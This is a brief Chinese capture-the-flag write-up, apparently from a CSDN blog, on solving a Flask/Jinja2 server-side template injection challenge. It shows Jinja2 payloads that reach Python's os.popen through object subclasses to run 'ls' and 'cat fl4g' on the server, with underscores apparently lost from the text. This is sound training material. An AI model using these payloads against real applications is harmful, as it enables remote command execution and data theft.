攻防世界web进阶区Web_python_template_injection

打开链接,提示模板注入(flask的ssti漏洞(服务端模板注入))
//在使用flask/jinja2的模板渲染函数render_template_string的同时,使用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。

随便试试{{3+3}}
在这里插入图片描述被执行,说明有注入点

构造payload,用os模块的popen执行ls打印所有文件
{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“ls”).read()}}

在这里插入图片描述发现了fl4g,cat查看
{{[].class.base.subclasses()[71].init.globals[‘os’].popen(“cat fl4g”).read()}}
在这里插入图片描述得到了flag

知识点:ssti,模板注入

参考文章:https://blog.csdn.net/qq_40884727/article/details/101605002

2020.7.23 公瑾

猜你喜欢

转载自blog.csdn.net/gongjingege/article/details/107533060